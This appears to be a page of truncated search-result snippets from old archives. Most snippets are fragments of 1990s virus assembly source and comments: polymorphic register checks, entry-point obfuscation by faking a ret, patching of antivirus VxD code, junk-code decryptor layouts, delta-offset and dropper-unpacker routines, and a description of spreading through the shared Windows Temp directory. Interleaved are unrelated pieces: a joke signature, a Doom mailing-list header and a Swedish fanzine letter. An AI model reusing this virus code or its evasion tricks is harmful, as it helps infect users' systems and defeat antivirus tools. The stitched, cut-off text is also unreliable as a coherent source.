#6

... _register] mov al, 1 ; check the right bit shl ax, cl test ds:[register_compat], al rc_exitrout: pop si ax cx ret rc_check_bytesize: mov cl, ds:[garbage_register] mov al, 1 shl ax, cl test ds:[register_compat + 1], al jnz rc_exitrout cmp cl, 3 ; if < must check 8bit aswell ja gewd_regcomp_exit mov al, 11h shl ax, cl ; check both 8bits regs test ds:[register_compat], al jz gewd_regcomp_exit mov byte ptr ds:[using_8_bits_register], 1 gewd_regcomp_exit: xor ah, ah ; just set the Z flag cmp ah, 0 ...

... , as usal, a call or a jmp in the last section is very ; suspicious, here we use a program opcode in order to jump to our virus. ; You will tell me how if we don't use call/jmp, well, we will fake a ret ; ; The idea is the following: ; ; PUSHAD <- this for restoring state ; PUSH Imm ; XOR dword ptr [esp], Imm ; ADD dword ptr [esp], Imm ; SUB dword ptr [esp], Imm ; ROL/ROR dword ptr [esp],Imm ; jmp to ret ; ; we have in fact two possibility, drop this code in alignment cave and/or ; ...

... ,28 mov esi,esp push 28 push esi ; esi = MEMORY_BASIC_INFO push ecx @@fx3: VxDCall VMM_PageQuery test dword ptr [esi+10h],1000h ; mbi_state & MEM_COMMIT lea esp,[esp+4*3+28] ; Fix ESP popad jnz __kavxd_2 popad ret __kavxd_2: inc edi cmp [edi],esi ; &#60;esi> jne __kavxd_1 call ebp jmp __kavxd_1 kavxd_kill_moveax: cmp byte ptr [edi-1],0B8h jne rt mov dword ptr [edi],-1 ; R0_xxx <-- 0xFFFFFFFF ret kavxd_kill_cd20: cmp word ptr [edi-2],20CDh jne rt kavxd_kill_both: mov word ptr [edi-2],0B890h ; n ...

... directories, and preserves ; the current directory. It then allocated some memory and writes the ; original 7 bytes (from the entry point) in the allocated memory. Next ; in the schedule is to drop the dropper files, it's primary location is ; the &#60;windows\system> directory, if the user hasn't enough with access ; to write there it will drop in the <windows\temp> directory. As all users ; share the same \Temp directory (with default settings), in winNT it will ; enable the virus to spread ...

... ÉÍÍÍÍÍÍÍÍÍÍÍͼ À----------Ù ; | | | Æ>¼ º Ú----------¿ ; À---Ò---Ù | Æ>Íͼ É͵ Thread 3 | ; º | Main Æ>ÍÍÍͼ À----------Ù ; º | Thread Æ>ÍÍÍÍ» ; º | Æ>ÍÍ» º Ú----------¿ ; º | | º È͵ Thread 4 | ; º À---Ò----Ù º À----------Ù Ú----------¿ ; ÈÍÍÍÍÍÍÍÍ&#60;¼ ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͵ Thread 5 | ; Ú----------¿ À----Ò-----Ù ; | Thread 6 Æ<ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ ; À----------Ù ; ; Í -> Thread being executed ; ; So, as you can see, the virus body launches a thread, the main thread, and ; the main thread launches ...

... of junk code that passes the control ; block-by-block to the main virus decryption loops. There are eight blocks ; written to files when the virus infects them: ; ; +------------+ ; | | ; |PE Header | ---------------+ ; +------------+ | ; | +-----+&#60;-+| | ; | |Junk2| || | ; | +-----+-+|| Entry Point | ; |+-----+ |||<---------------+ ; ||Junk1| ||| ; |+-----+----+| ; | | | ; |+-----+<--+ | ; ||Junk3| | ; |+-----+----+| ; | V| ; | . . . | ; | +-----+| ; |+----|Junk8|| ; || +-----+| ; |V ...

... ; GetDeltaOffset proc call getitright ; Oh! What is this? Incredible! getitright: pop ebp sub ebp,offset getitright ret GetDeltaOffset endp ; =========================================================================== ; Dropper unpacker (25 bytes) &#60;<->> [LSCE] - Little Shitty Compression Engine ; =========================================================================== ; ; ÜÜÜ ÜÜÜÜÜÜÜ ÜÜÜÜÜÜÜ ÜÜÜÜÜÜÜ ; Û Û Û ÜÜÜÜÛ Û ÜÜÜÜÛ Û ÜÜÜÜÛ The Little and Shitty Compression Engine ; Û ÛÜÜÜÜ ÛÜÜÜÜ ...

... is some sick pathetic cry for attention and notoriety...well you just might be right. Have a great day, John ps. My mail can handle anything. UUEncode it, mime it, it won't matter. __________________________________________________________ #include &#60;stupidstuff.h> #define USER "johnw" /* John Wakelin */ /* Johnw@datametrics.com */ main() /* (703) 385 7700 */ { while (isstupid(USER)) ignore(USER); } Reposted by Snider - ----------------------------------- Rainer.Spielbau ...

From: owner-doom-editing-digest To: doom-editing-digest@nvg.unit.no Subject: doom-editing-digest V1 #6 Reply-To: doom-editing Errors-To: owner-doom-editing-digest Precedence: bulk doom-editing-digest Saturday, 15 October 1994 Volume 01 : Number 006 ---------------------------------------------------------------------- From: cant@softchoice.com (Chris ...

... lv. Och jag vill minnas att jag tyckte den var skitbra. Men så är det det där med minnet, som hittar på egna saker ibland. PS (utanpå kuvertet): I din lista i Munin 2 glömde du två noveller av Kjell Jarn, "Mattias" och "Tuppen" publicerade i Spektra #61. Eller räknas inte fanzinen? Visst är jag lite vrickad. Men som Pippi Långstrump sade om sina fräknar: "Men jag lider inte av dem." Jag tycker inte heller att Star Wars-böckerna eller en del av fantasyutgivningen är speciellt intressant, men jag ho ...